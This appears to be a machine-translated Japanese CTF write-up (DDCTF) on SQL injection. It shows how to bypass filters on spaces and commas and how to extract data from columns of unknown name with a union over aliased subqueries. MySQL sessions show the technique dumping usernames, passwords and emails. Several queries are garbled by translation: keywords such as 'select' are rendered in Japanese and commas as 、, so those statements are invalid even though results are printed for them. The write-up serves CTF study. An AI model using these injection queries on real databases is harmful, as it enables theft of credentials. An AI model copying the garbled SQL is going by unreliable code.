MySQL で不明なフィールド名を回避する方法

MySQL で不明なフィールド名を回避する方法

序文

この記事では、DDCTF の 5 番目の質問、つまり不明なフィールド名をバイパスする手法を紹介します。ここでは、ローカル マシンを使用して操作します。アイデアは素晴らしく明確です。皆さんと共有してください。詳細な紹介を見てみましょう。

実装のアイデア

この質問はスペースとカンマをフィルタリングします。スペースは、%0a、%0b、%0c、%0d、%a0、または括弧を直接使用してバイパスできます。カンマは join を使用してバイパスできます。

フラグを格納するフィールド名が不明であり、information_schema.columns もテーブル名の 16 進数をフィルタリングするため、フィールド名を取得できません。この場合、結合クエリを使用できます。プロセスは次のようになります。

アイデアは、フラグを取得して、それを既知のフィールド名の下に表示することです。

サンプルコード:

mysql> (選択 1)a、(選択 2)b、(選択 3)c、(選択 4)d を選択します。
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
セット内の 1 行 (0.00 秒)
 
mysql> (選択 1)a、(選択 2)b、(選択 3)c、(選択 4)d から * を選択します。
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
セット内の 1 行 (0.00 秒)
 
mysql> select * from (select 1)a、(select 2)b、(select 3)c、(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
| 1 | 管理者 | admin888 | [email protected] |
| 2 | テスト | test123 | [email protected] |
| 3 | cs | cs123 | [email protected] |
+---+-------+----------+-------------+
セット内の 4 行 (0.01 秒)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4 |
+-------------+
| 4 |
| [email protected] |
| [email protected] |
| [email protected] |
+-------------+
セット内の4行(0.03秒)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
| 4 |
+-------------+
| [email protected] |
+-------------+
セット内の1行(0.01秒)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+-----------+-----------+-------------+
| ID | ユーザー名 | パスワード | メール |
+-------------+-----------+-----------+-------------+
| 1 | 管理者 | admin888 | [email protected] |
| [email protected] | 1 | 1 | 1 |
+-------------+-----------+-----------+-------------+
セットに2行(0.04秒)

要約する

上記はこの記事の全内容です。この記事の内容が皆さんの勉強や仕事に少しでもお役に立てれば幸いです。ご質問があれば、メッセージを残してコミュニケーションしてください。123WORDPRESS.COM をご愛顧いただき、ありがとうございます。

以下もご興味があるかもしれません:
  • XSSとSQLインジェクションを防ぐ:JS特殊文字フィルタリングの定期的
  • 重複データをフィルタリングするSQL文
  • MySQLインジェクションバイパスフィルタリング技術の概要
  • SQLインジェクションは一重引用符の制限を回避し、インジェクションを継続します
  • SQLインジェクションバイパス手法の概要
  • 複数列の複合インデックスを使用して Microsoft SQL Server のバグを回避する
  • SQLインジェクションバイパスに関するいくつかの知識ポイント
  • SQL Server シンプル モードで誤って削除されたヒープ テーブル レコードを回復する方法 (ヘッダー検証をバイパス)
  • SQL インジェクション技術: 明示的およびブラインド インジェクションにおけるカンマ フィルタリングのバイパスの詳細な分析

<<:  TomcatはNginxリバースプロキシのクライアントドメイン名を取得します

>>:  jsはjQueryをカプセル化する簡単な方法とチェーン操作の詳細な説明を実装します

推薦する

Vueはチャットインターフェースを実装する

この記事の例では、チャットインターフェースの表示を実現するためのVueの具体的なコードを参考までに共...

vue3でDOMをマウントするためのプラグインを書く際の問題について

vue2と比較して、vue3にはアプリの概念が追加され、vue3プロジェクトの作成も // メイン....

DockerでGDBを使用するときにブレークポイントを入力できない問題を解決する

質問docker で gdb を実行すると、ブレークポイントに到達しますが、ブレークポイントに入るこ...

マージンの重複問題を解決する方法

1. まず、2つ以上の隣接する通常フローブロック要素の垂直マージンの崩壊を引き起こす原因を知る必要が...

HTML の水平および垂直中央揃えの問題の概要

最近、センタリングの問題に数多く遭遇したので、後で簡単に見つけられるように、時間をかけてそれらを要約...

Vueはファイルのアップロードとダウンロードを実装します

この記事では、参考までにVueのファイルのアップロードとダウンロードの具体的なコードを紹介します。具...

インデックスとテーブルリターンをカバーするMySQLの使い方

インデックスの2つの主要なカテゴリ使用されるストレージエンジン: MySQL 5.7 InnoDBク...

Dockerイメージのインポートとエクスポートの実装

GitLabのDocker使用法gitlab ドッカー起動コマンド docker run -d -p...

JavaScriptのスタックとコピーの詳細な説明

目次1. スタックの定義2. JSスタックの調査1. スタックとヒープ2. 基本型と参照型3. 値渡...

バッテリー残量が少なくなったときに Linux を自動シャットダウンする方法

序文最近、私の住居の電力事情が不安定で、突然の停電が頻繁に起こります。ノートパソコンを持っているので...

IDEA の Docker プラグインを介して SpringBoot プロジェクトをデプロイするプロセスの詳細な説明

1. Dockerリモート接続ポートを設定するサーバー上の docker.service ファイルを...

VUE+SpringBootはページング機能を実装します

この記事では主に、Vue + SpringBoot でページ分割されたリストデータを実装する方法を紹...

Flinkのフォールトトレラントメカニズムに関する簡単な説明:ジョブ実行とデーモン

目次1. ジョブ実行のフォールトトレランス1.1 タスクフェイルオーバー戦略1.2 ジョブ再開戦略2...

vue-cropper コンポーネントは画像の切り取りとアップロードを実現します

この記事では、画像の切り取りとアップロードを実装するためのvue-cropperコンポーネントの具体...

アイデア展開Tomcatサービス実装プロセス図

まずプロジェクトの成果物を構成するスタートアップ項目の設定 Tomcatサービスを作成する開始したい...